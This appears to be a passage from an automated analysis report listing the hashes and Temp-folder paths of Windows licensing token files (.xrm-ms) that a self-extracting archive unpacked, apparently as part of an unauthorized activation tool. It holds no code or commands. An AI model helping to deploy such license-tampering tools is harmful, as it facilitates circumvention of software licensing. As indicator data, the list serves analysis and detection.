MD5 d45117903c746a6f4482eb25bb579434
SHA1 61ef551971aaca0764a3dfbba819ba72dbbc77b9
SHA256 008c0d674f98e2634d99e708bb22c135ba53d151038b9892acd39fb1493e295e
SHA512 59317827ca970b93086c815962cc7a951c7e79119ee0b7a354a5a3f01264985d88684e722497fb9dad6174fdc46d4d9b19f79e9be2e6b48dd2564694b274344f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-PurblePlace-ppdlic.xrm-ms

MD5 0ee363e7db60642ecc603f3b1a738a46
SHA1 adb6166efef8b6e237ea433e0c019f493793f1a3
SHA256 39a10724afa23aebe57d792ed399a9c6fa81809b7e44872bc786b68d7fd8fa4d
SHA512 18eab2c8af20e4f88e6dc438392032f2a20f0043fe82c076d6aa9092e41d8bf85c59d5cd78b4b0a1d875f35689263edae3d13a1af44c9508b49a1e27d33711e4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-Minesweeper-ppdlic.xrm-ms

MD5 05a0c02123cc650bd6dc70c256262d2e
SHA1 1f18b25b3eeff7cc87de9f224e332db428f7cf4e
SHA256 c195f6130e3755a06cb63c1ba16be99f0579b160018c9b6731e4d56d3d8ac7bb
SHA512 8a342d5d7c10d00b7bf99e520d98ca892c863cb3798c1958d103389d594293dd375d6de62bcd2a665594033bbd64198138429d19b5d9efd9d4d71786bcaa883c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-Minesweeper-ppdlic.xrm-ms

MD5 0c447b7bd0c9e11b7e8b6cc7aff24f81
SHA1 bb024361afce85473470048812b378a02d9a3e01
SHA256 26271eed367732f4794b6536c717872cb9857a32f347e2c448693ec92dea8a63
SHA512 cba307d3e33edbbe7bad2d39b5534660b88880d6eb38e64f0620d751554ffa25b29c5308c2e62490fd04a6b9d50b88650c24784516fe77a6d26d7c34b9a85cd9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Minesweeper-ppdlic.xrm-ms

MD5 07a40033b73e0f53a922252f6a3efe19
SHA1 c997f7b2babcfa586e98138d3ddf4fac950869c3
SHA256 edff96a84d3f506c101d38bfdfe0eb8a85dc713a38f755161615913c2a830e5e
SHA512 c017f74b438b85b5b65c5aac990dcf9be918b9efc614d4fbdcc5ee6cbdbff02b9d99e1533b1979d761d99baaebe2dd5db599a9f3e2a8a5c21ac0cae2a575c2b9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-Hearts-ppdlic.xrm-ms

MD5 ad6f39bcfc3f6e83e98e3a3b76d7a005
SHA1 dcecb722e5109a0f5e12adbcb49157fdfd3b99d7
SHA256 7941b35cccde7dc4d029197a38d92542eb57c66a667dd300129f08a73d56ab1a
SHA512 ff4f2b9eae8250cc53d5b1b3fe0eb5724999667f2100c7a6f9edaae1458c034f2605011bc4ec77e5354a94d9df9ff0a4bc5d2fba8434aadd4576a95c1db8eb7e

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-Hearts-ppdlic.xrm-ms

MD5 d4d4c43acd462ee281bba31fb122907b
SHA1 03086696e0c16dad19e36c7d3057c96122cc752a
SHA256 93d8fb79ee7118203ddaf295a4cd5d5abf4d04a5f88d11c7c0a7611bde43615c
SHA512 840cd7604b3bb61dbbfb5ac906da7aa1d8db7bf41006d14dd6fc9eb1040b73ceb0e239996999927d4388e6ba7db8de3810086ced66316253939483a9f70c7a09

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-Hearts-ppdlic.xrm-ms

MD5 391bd2a7cc60929d685db240330cba2b
SHA1 fd802854cc759635c0d7b7caf036a57fedc7a944
SHA256 93439a9703836715414b6f8b7e763d88f07d22f9e8f3e9a158ac1d40643c5654
SHA512 0be565462458ea1559da424b14d5ca5fa3833d19fb3e116a6a330cecbf53435ee31f06f9c0684fe11f52e409fe52116688062f3796be0f6e242e89200b125e1c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Shell-InBoxGames-FreeCell-ppdlic.xrm-ms

MD5 90684bbf7770b6f733e1abce52d8bb79
SHA1 94d414f25899e958d107407ebab13fe5664e57fc
SHA256 671263f12125b7f597097a07ebd44bc2caa04bbff01b7a8330341a211e163577
SHA512 097eb309bb3d5f48ae7e149075a9ba4fa5dbce405276dedeb89428e60eb9f817a2988a8770654dc3db76d31756b983e695a1a357e1d731b83e8956ae919e28ae

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Starter\tokens\ppdlic\Shell-InBoxGames-FreeCell-ppdlic.xrm-ms

MD5 b5026c3797f076f39a5fe301d9b63591
SHA1 160ad7cb661dda99e013c4e31f4e703ef30a4f92
SHA256 f6cd558710f5b472e095e469a9ee79231aa203a693ad003343097972ef416b39
SHA512 b962b2f4b82b4c1f76583eac84129986a19d3952a6590454d3add90867fa125099f845f500f41c07e587c52c49a95f3d2576abb09682822ca1ce61b2ad373785

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Shell-InBoxGames-FreeCell-ppdlic.xrm-ms

MD5 b7944b89503561196273c0d17502f030
SHA1 ac9940c544ea9abe85d6e9507cfe1c9f9eb27207
SHA256 291ff6ae7bc286866a51c1bf18871e0b5bb0b5fb614041315da4448073de23bb
SHA512 a9748aebc3106662a153a31e5df00ec463d034fff81398069b1051ad7450eb4d64ef0eab16e1e85c1381e16d957902e876d68d7641e04113008852b201aef6b7

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\shell-homegroup-ppdlic.xrm-ms

MD5 5e8913ab7fbaf4bc9be6012e91911b6f
SHA1 16138d3b92b402a7e425e18a36c88e2cbea265f8
SHA256 97b0d12d1637ec0f8a3e317c1f2a2ce7b766dc4e160882f36db497034824c316
SHA512 c6de263030a767b9ac493d02631c0a8dff7cd4d2a2a964047dafc91e404dd9e1e965295c6f9e3f9eee55227a70f7685d9cdcfc6bc73fa02cda82ed6e367c8f15

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\shell-homegroup-ppdlic.xrm-ms

MD5 0229e957d495c4244b7820a2893216c7
SHA1 f74e192cd1355d170189d667831ff73271406c9a
SHA256 fbde6fb95e094c38fd25661621a9da4dee09fe286b82d618cb407fb8fdcbd2da
SHA512 8cafa492dcf5bd58da2a4d30d0d5a3beeca50c04151a9b08bc9cf7be645282b441869bff6f919215f788871dd94b95638cd7d78894fd704ac4d9c6e2090ff51f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-UX-ppdlic.xrm-ms

MD5 5f01f3f0e3aee9dcd3b20f25ff47e2b6
SHA1 61e102acb5ee67e208a97d1342ab206fbcc0ce48
SHA256 8b796e4ec3443d3edf1b07ce82aaf185e7a778ec5f9700f110b095fdf98e646b
SHA512 b6af034517f1bac9d18569a852b6fffac2dcd57baf5bf1d62f687476b24d69d72d86be9445c5215459c670315329383d9b58800b4d12bb6b0b2101a9ea4f3895

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Security-SPP-UX-ppdlic.xrm-ms

MD5 85f2950d444f7caf23e156c8ea699e23
SHA1 c16654e4539d4ba816c4d432feb06b78b3bc2d12
SHA256 58e92197a9b7c766379a65ec5053c60614a8191aee1b77dc10a580901b133edb
SHA512 27c8bffa3e4dd983ffaebcfa9fd9e796ba576471b1c9c44df141b2f70ff66cafc1f07197ec30a6dd899d2de9f86da9d52cd44bf9112bd5615e581508dee4a6a8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\ppdlic\Security-SPP-ppdlic.xrm-ms

MD5 894949e794db63353c8fde78b8d36bd9
SHA1 63a63eaa27eb8aee50dc817af6277ce046400c48
SHA256 dcfd08d3f83d0f39ed3e02d32b172085b9b1a5251e96dfa73619254d17267511
SHA512 6553e732525c4a3cfc283fbf74e90b052ec3d1d7f347dda988705961cd525b9305b9a324dd8e5554978fb5d4e28aa9234bc896fdc159f43cc4e54893919b5dd5

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\oem\tokens\ppdlic\Security-SPP-Component-SKU-Ultimate-ppdlic.xrm-ms

MD5 4d24edb585cd787b29146a32818bf1dd
SHA1 52e06e729d8be61c4564c3abdbe99b91412ef5d8
SHA256 19f434de6e514f97945ec78df35c8e4914e0c569ca525507f2aede4351e13740
SHA512 c684ab2f0d659acef76a4306ce2d9ef08767fbd89321cd14e45d640c18295bc135e005cd712cb84dbd409892831c29863d223eb065edd743e483c901c0b96f56

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Starter\tokens\ppdlic\Security-SPP-Component-SKU-Starter-ppdlic.xrm-ms

MD5 509919a4163f8f917e1d3c274db35502
SHA1 601ba2e337e479081ba4644f5f64c0500f255d6a
SHA256 dfbf74746430b32cd031b7b395448bc1aa3f62bdee8d9eb126927d04b3c40bc7
SHA512 21fe14e376e02733fffd5fe74904ab1e72a2925d20f35f12efd7917e5a252885d0d5cb9069f191162e6fde3b57ef6053a3ebb544042048730a5325d2499150b9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\default\Professional\tokens\ppdlic\Security-SPP-Component-SKU-Professional-ppdlic.xrm-ms

MD5 7c3005299196f7958bad1c5a535b6dd6
SHA1 ad1b4bffe61549fe4855353bbffb6a892b04dcbd
SHA256 dd32437f13f100e52e80a5a3759cb444210accf6e8bbf08b599c4a03f2757a57
SHA512 d24f0e4cbded670351427ac3e3bde4e2f51afdc8882acff7f71ecdd1ff17e532bed3e547604c37729af39dae4cc83199d317985df565bbae45ebdc98addd04bb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 0f19b20c683c2345ecaaee07461e1f20
SHA1 f5d35af2f61e92b8003d41a0aee7a7e78b78bb4d
SHA256 ecd1c6eea89c8dcb10991c1653fa30d92e3054a45f0cf0d46f6265e6d6de11c8
SHA512 35329ca8f2879c58c75a504f72cd76d65f8398a9c5639c4fd7f655a912e5aeda84b08fe8e337a5d1bbbd896187c131612f6e8d50e590e8526201d3218a711220

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Security-SPP-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 0c3fde8673610f69d28fb6e033bfafd2
SHA1 5a3b49415166735f6860753727591bc4d1a43102
SHA256 ca4f17f0631d82436c007bbebec0692921e1e0680186e7e4ed1a6459328b1f32
SHA512 db3e979592cda64795ab905b670337f7f0fcc1f8de4fcee70ca2dd5089ae0321c773134bb68fa4789cc80d47a765e61d18eb00a6203efad851db860ee130eb8b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomePremium\tokens\ppdlic\Security-SPP-Component-SKU-HomePremium-ppdlic.xrm-ms

MD5 0523b168ca39c80789cc838d43c1f1f4
SHA1 dc1e4a921fa8b5a72a8403d685fe7778aff506de
SHA256 f18e398d521682096e7e71c6989675bac7420e8fca3966dd35af0e0f4c55a7c7
SHA512 bafaed3aca1790fb3421b93bf5c6969aa1d9bca82c9d97e83039ce0ae03da251e9c4ee9626740a5ce1d1cbadb74ff95dbf328519cb9fd88c5fb0e668078bce3b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomeBasic\tokens\skus\Security-SPP-Component-SKU-HomeBasic\Security-SPP-Component-SKU-HomeBasic-ul-phn.xrm-ms

MD5 24629d7a1bfb96bf24ab289785b778c0
SHA1 344f92c8a09dd763045a22d6ff2139b1a5be43cb
SHA256 84f04a487c5b0fbcff3147c17f3bf63567b6b4437b86addc80b0766e38a54b07
SHA512 2a82c2aabaf1a15addf84d55a8f6fc3fb9c0511de82fe568c92d6a32dabf012d1ffa265b9b5e754a3f8db19b5e9304ba9dc0799dda67fb80c78d3230c2b4ce18

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomeBasic\tokens\skus\Security-SPP-Component-SKU-HomeBasic\Security-SPP-Component-SKU-HomeBasic-ul-oob.xrm-ms

MD5 03e9c8140c0efbf64c219cc7efd4f214
SHA1 358142d89ba1528f12b99a1d5e5b20e5e1be32f7
SHA256 b2ffe74876bc15ad8089f3aef9314d977dfe639cb528354ce76bd16ac358abfb
SHA512 08564d3b9b52a4944a1f1077add4ac9ee573860edd0ab429ac7302f361053ec4482a6ec6e3f586db6fd1071b2160f85251263c72195b462b750ff907efe75a08

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\HomeBasic\tokens\ppdlic\Security-SPP-Component-SKU-HomeBasic-ppdlic.xrm-ms

MD5 efa2ae48ff710aab4bcffab998e7899a
SHA1 3f292481c5d3036190b45b602fde06363ba416fa
SHA256 10e419e1461c1333704bc9b7c974765c7f12a86aeec882b61212eb9834e92134
SHA512 f5ddb7ee27fd5dfd63e2507a1a200dfe7f3ae0a50adbed655c1dffb3b37f9c84b11b9b7268656451f72d9c5c1a61442ec6979bfddfa41949eb3907e11517bb11

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\skus\Security-SPP-Component-SKU-Enterprise\Security-SPP-Component-SKU-Enterprise-ul-phn.xrm-ms

MD5 4437534428de9511706a3cac35b16101
SHA1 884e567eb91510873b9abcb4c92c51f34db807cb
SHA256 77caa1d763bc6a62dab31caed11bf7dfd8f2f1b56ff8e1a3f4057082cf98977e
SHA512 32aaee95c2f9a5d2a021c38a388b4776fb1a58b9d943ac2bd7ba1452535b907409811aa8dab8fe3762ccd8f3f4c571153d3a53c6526bee7dae41fed3548a1f18

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\skus\Security-SPP-Component-SKU-Enterprise\Security-SPP-Component-SKU-Enterprise-ul-oob.xrm-ms

MD5 f32a413f1c3d59176da9828cfd048187
SHA1 bbefda8674fdb190b93a735fc60404bc58b819d7
SHA256 f4ec66c62e86859d2b7f32541c62dedc4fc4ed3d467e8400a656707b20f02850
SHA512 7784424f184a45b4fdfe1251ef23b10c98f93888aab720b627a8c2e30aa0a2a74142cf4213a7b6f58235b351d79262a44f94cdbfd8de98b1e973febabac13db0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Enterprise\tokens\ppdlic\Security-SPP-Component-SKU-Enterprise-ppdlic.xrm-ms

MD5 eaec7e4a3e040bb6e5a5a7060c4ea03b
SHA1 485fa3647dda6f22534681bc381ac07ed701d204
SHA256 882e5f99fac15f101e70aecd6c0852eec94e2de0c222d7e1b51d8d248c6a6965
SHA512 dbb63159ad0650297dc36bfe81ef20f16d1a0a56f9679b36993a8dee4745054c32186038fc0f846a6face02fa2700102845f8b6e6d1b38f6c187208a0438c5d8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomeBasic\licensing\ppdlic\Security-Licensing-SLC-ppdlic.xrm-ms

MD5 9e7e23572d1e530910c88ecba0b1a679
SHA1 3e141555ba74c9ee168c545384b637874f35b0df
SHA256 e3d060ea07a8d356498a9287ac89a4a17305d1243b9e10ee1f3c46e972e606fb
SHA512 0f9384b193c8b9d747bf08f45b86046fcf0a7001188b18c8b33ea99e1177fa62cb51d9d4ab607b6cf4e35d89ea3dee0eb4eff77d5a8e3809b951db3e73fa01bc

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\Security-Licensing-SLC-Component-SKU-OCUR-ppdlic.xrm-ms

MD5 ea4c9e3d065289f99b75cca7e65ec0c5
SHA1 e377f9227b35dff577da363d102603ed6e5c445e
SHA256 f7a778f16aa72e03c588582fd6b28a0d9fb4969fce083ccf4c2d8f38dba924e1
SHA512 295525798cc5878ed348ca63694bc073f7c533905363c0ce42887e6be108e005573351532e298b219216f89e435f5123e80d7d35c700e24821c8e22a78402d5b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SecureStartupFeature-ppdlic.xrm-ms

MD5 204b8cddf69c7eea0503b5004773f680
SHA1 72a38aed067a95fb25f6d219022d1d523742e84e
SHA256 cb19f9d4cf3951f2b0cef27c8c59501692d2583c3b1dce711b25ec1e4a5f2bbf
SHA512 3910329d65ea8fa2fb0aa9f4224e0ed858ef9a4fc8bad401bea7a077be9cb00d2e80ed4b95da4d82b6de081a03916c4e44aac5b7134b0296a6bc2825240cadfa

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\SecureStartupFeature-ppdlic.xrm-ms

MD5 fb00bd2aa76c1748699f472d350afa54
SHA1 12f070619c275a42728fa4c6cb64acafd8b3997f
SHA256 f985c0a73c3896757456bc27dded4be78815685798130c431b98226128e085a9
SHA512 3d7f75e046f6cfdc437f546a15132f5d5881ec05777b7031a0fe9abb160b4f4cafb87bf26735abe94d05f038c4f49a0b026a8d6e5468311888019d66d33ccacd

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\RasBase-ppdlic.xrm-ms

MD5 d35ede3c39d33b456bb69bf64e84ba0e
SHA1 84826fdb907c0c4df442c427d2d7b2e8c2a236d4
SHA256 8955949921543758dd86948927a29ca3a8f700164e108d9e19c34eefb94dccd7
SHA512 ea8c257e3e656aa9f787208762bc8e8cbc1697dea50e531a84dfa4e4151ec228720169ccee674f57a00dfb0bd9e08481ca43586d2213aa406a602d26a2e2c7bb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\RasBase-ppdlic.xrm-ms

MD5 cd898c26a1cb093c762dd5f4b4429bbb
SHA1 cb9bdf3991b099a15767318b8db19887d5cc7a18
SHA256 e0634f088316c0f2e00fd9ca67d846cc085ff6561f5cc5b63ccb348f18435109
SHA512 e8e3242e7f13ba657c6ec30277b012f0eeb423677e31e16656eeee5d8d97c05a466f0393f7cf99e6dcc3c0a426c2cde0c8f6fccc1c2bfe8f55d525f2b0c96b22

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\RasBase-ppdlic.xrm-ms

MD5 718e97ac13cee5902e3fdbc8e5c07b75
SHA1 fe7e2ed1afc21ad1523a44333516b01839e45c10
SHA256 0fd10296ea6d14403aedb51a8c03046cdc7a5dcbf9dec86f774d3a8598f06c23
SHA512 375accc721e7292fd3d01ee1446693bbf8ec2b25b7718a3094f9bac6eea16eb089f724f07efb7ef18bc0feba5fa0a86b09ebc7e7fa14205746740734fb0371a2

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\provsvc-license-ppdlic.xrm-ms

MD5 57b763f840c415946380224c05303876
SHA1 5fe46b83879a96b0f2e1e9ada9d3a6f9db24de14
SHA256 9d2fd0ad48117aeabab29a185cdea02f149e99429322bd056414ad1230f143b8
SHA512 03145f93f9b34587b39ec4d81f2a067f1e267d1bb6f3f66bff37e42d693c066dddf1e9f3313fa092bf9b823394c40cd45d34e5481ea3eca1e7fa9d5143fdac7c

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\provsvc-license-ppdlic.xrm-ms

MD5 5cdb715a6db8c7d1eb87010f0f5cf9d3
SHA1 29f448e4b8ce39bb0810b5bb8bdbd52190b319f0
SHA256 0094bdb31f236b0732afeb81bb614e5b3ae5407d2a337d79b55c092eb3387e8f
SHA512 fd2ce2d4d8d0873b20e0b6f4ff9604d75d1761bff4537b4ee77e1771c2cbb08a9ae4cb871b2944653d4873811a28bfbbdafe249fdb2b84c9b71775251c115b99

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Printing-Spooler-Pmc-Licensing-ppdlic.xrm-ms

MD5 cd75b066cd6327ba7962cd3bfb6b1cff
SHA1 e06bf103d126518e06bfebaa3f127d9a6b258b00
SHA256 2b05d5533faa9a5e621eba4b6d75e719a0e066920ae055215f61db6facdc0743
SHA512 1a21534251f145a1f289b6b1b1c714e911f80983283c9a56a3997b5154f6b42d97cd3f127f852789d6e61fe02e8d655dd3f660f852c616e5469143b5f65762d0

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Business\licensing\ppdlic\Printing-Spooler-Pmc-Licensing-ppdlic.xrm-ms

MD5 9c6de396627100ba3f4f6449101071c2
SHA1 3593b89ff1071d81b0b988733ae4a010c6a083b6
SHA256 3f3e50aaa0892342f5fb17d684a9b08c6491f4d596ba288e7b2147a3a1d8565c
SHA512 052fe7fee9aa307628507d5c130f74c95e37b8d193de9d92fa5c52e009f1d90cf75ab0af3f64ee887cfcb50beb3ec25cebb6eaf00fb07ee15d7e27ccaefdd170

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms

MD5 28d53b28c876f76f3f8d65ba0738ea86
SHA1 8fbf7be305794623bb80f79391485f0fc6cd8532
SHA256 cbd99db274416f8d392c2b4fb06d584a672a14093e1e0f7f8f7ce29edfccec19
SHA512 fae916f8b0b6c19cb814f1efc72d70b166043082ca9ffa6bbd9976aa62bc29b42603fd605c82b4a4623c4b5ff624c5a5586aaf9fc754ded8366d6bdca3ca2d08

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms

MD5 fec8778c37d9bb722af4ea788ddcf5f4
SHA1 77d1f28c33706148d9a302dc2fadc9099257a72a
SHA256 92b9992e551df53800081ade8184034fed5b41ec3e6795f8d91042c6604c847a
SHA512 64ae7b996d348bb23c7c6d3503f1c71b032c86a6b26794cb4b3fd18b01cb9f09e0439cca3a33ef48dafdf10bcf96c0c9556e8ae9fab26ec464a8f42dbf31d58b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms

MD5 a30b7723a419324978d6dc3b770159f9
SHA1 0e929af2e93aab7855dac3faadfca8157d70dc69
SHA256 b719bff57185e7a17038e08e38f9dcd8f7b0f40ed94e0c59513fba2fd9845cf3
SHA512 18fdf625b6e4a9538ab0193f587119e926dc37a92f270bfb6e9168115c3c953150c0512aafd42e910427e7cedd94687886a89e3d92c47161d1c35f6823b785c5

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms

MD5 da8a60a14b7b3d2907cb85f04819677c
SHA1 042c71c67dd3b57232ecef1d10d45486cf16f625
SHA256 352d44c7ebe115034c6901c721d3d6ce9250b1af4d114a6ac7c76c8ae864a8d1
SHA512 33a4ba18e48b957148dd182d11780acce76d137250c591cfa2bcc05d4a3a65e6ea89b829e4ad3299f1db59f53e292a09e6bec83fcf5df72b4d2c9e8611027bb8

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms

MD5 a6c2758212303295e180ad70fb520d71
SHA1 0b9d1c4d4ddcd1347dd8684b77704d865ae43df6
SHA256 82e1ca366e969266c53ff662ab57d05ad32a3c85367c85431088df62bb2c5af5
SHA512 e7c2eb91882abc7e9d6f3f8bf28a394dad24568fbb08b79f4e1b7bcfe89663565b4274d2faabed7a768af4d3ffe9c20e8710571caec9a7a53cb62c602b566a19

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms

MD5 6c8a514c947d8cad0c46f08b1151803e
SHA1 5652386e653da4f9eed839194ee8c883183bf62d
SHA256 683c360e28b4d386df6af4828d756aae1e3eac86f6a08b0e5b29fe99df81d358
SHA512 21dc5bab7228aea531aee2d854f0f9e07b352e8b3836535de70a21c3e4a0d597840b366906af3934d41ae0e5449b092acd205c37841393633c08c0528912f32b

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\PhotoMinFeature-ppdlic.xrm-ms

MD5 2c29a6d530948477d1b3e2c1fa7e284c
SHA1 90a16d314a050327ea7eb5f36ecf75e9d1cbc2ce
SHA256 73caf41c40168d202625eb50ce40c42bbcd0cd9cd2526f82ed2059a6f0300d68
SHA512 9e5464d57ae66574b9cb070daf34e59cd77652f1abc342f214183864fbafbf08686520408e25b0aa8325daa6b21332fc5425f8ece593a30d9ff3e0616890489f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\PhotoMinFeature-ppdlic.xrm-ms

MD5 006e064bb33f73a6da08c6b3dace55e2
SHA1 f497a9b53369ddb2af9f1247a042e843a3f6d514
SHA256 ca1765057559b80f8aeb738bf4743741ced4c9cf94e6c459ab84a30f0ebdc205
SHA512 e0ec0626623073c577c83fc5cbc1e7436a8442e95f1c93b96d79c4a463ee459d16551460a92ce300d6cdf744256dd2dd98c268d84bf6791e33a18e5ae9c6f9db

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\Ultimate\licensing\ppdlic\PhotoMinFeature-ppdlic.xrm-ms

MD5 97c82d90ac5c191fa7d25dbb17453a14
SHA1 5eedeab919c07973ad29d28dc73ea274856437ce
SHA256 89ca566d3dc108c9cd13374d6e2bac520807ec5fdd74799f1fcbcb2eec3aae2e
SHA512 4b6edecefd43be3a6029bfb830c212c6575a0f30ccd0810d2fead51ca40b1ecfb7b9be731ecf36a144f5dccd560908a935eb221cfd7b0567fa90d9f14452ffd9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Personalization-ppdlic.xrm-ms

MD5 bced4fa9373aa95f46ace2f8330ee266
SHA1 4dec0deea10a2a905c0d7bea0e11951bdedff5c7
SHA256 b1590125dd0e2b97bca4826a28f51772469253ea809bf69afe62830b20ae1f69
SHA512 292777e4e73f71bef1f36e7ed86b4f848d86147addb2ddeb4e5c703110cad849ffcb36dd797c2b1d9e35472fb5ce5882f94c2bf4998a7e6e2e8b9f49a97dba8f

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\PeerToPeerBase-ppdlic.xrm-ms

MD5 9d211b0d0f167dff803e7f3d91faf882
SHA1 ba0b3d1ab7bb8c0e9421549fe576f3d0145c0d9e
SHA256 77d1625cb7e49d7fea84f77800c75d84eff42e51095ad8b947cbbadfd2bdd421
SHA512 a5480b61b4181c1094b34748c9170d1dd2740971aa41a2da395ba609be9706895bbce6740aa0f5a5e35e7e30aaabb5e6818d6d0035a0ed852c7cf573c0032e88

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Retail\Professional\tokens\ppdlic\PeerToPeerBase-ppdlic.xrm-ms

MD5 29d1810e433e591b1cd239d94730ec0b
SHA1 77c7b952b2e391dc8ee0b7a0cefb5b7f8e2d6c4d
SHA256 c0a7ac81686469b8aa3714cf4c03d0d26b46745ebac30c558dd3dbb5dd94a6de
SHA512 d2d797ddaafb10db4619807a021b1bcd8abac54bb1c00447b82c51b8b9af30d3d3beae5ff19183ddea59ef391fb5be35da0c77be98e1e00510b8ffb22460cca3

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\PeerToPeerBase-ppdlic.xrm-ms

MD5 aae505cdd6c07d13f45f61937791ccdb
SHA1 85c3ee3fab84d3ccf7e3008399118537f5acc9c6
SHA256 148c8a73904bfb54421e4d145242c3a15ce2234de0f6d87bc417a83fad5e8e03
SHA512 4a687ca5de7eec5132daaaee4266e08af5702560f03b45ca0d0c4d1dd4f01f158d56bd7852440a0db1f7d983821ba4c5e30d72424f9bb13a40a506d4df926b39

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\VistaOptimizer\HomePremium\licensing\ppdlic\PeerToPeerAdhocMeetings-ppdlic.xrm-ms

MD5 4482158fafcd71a2b32227da1cebb3b1
SHA1 80e462d2f364fff7305ffcfe66735553b584768e
SHA256 39cf9a305c346d102b0517f83453bb74f29a1405890b6050a9dac0cb62d14683
SHA512 1ce6a109f9a2ab016fc7f45abb0e006845a3d737ff515185b0d960bc9d2aef067e6632113392dd68e4cfbb1a5713c680d4a0948fa802380186d2e4924146c0ee

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\PeerDist-Common-ppdlic.xrm-ms

MD5 307069cb761e8f9d9702679cfdd03424
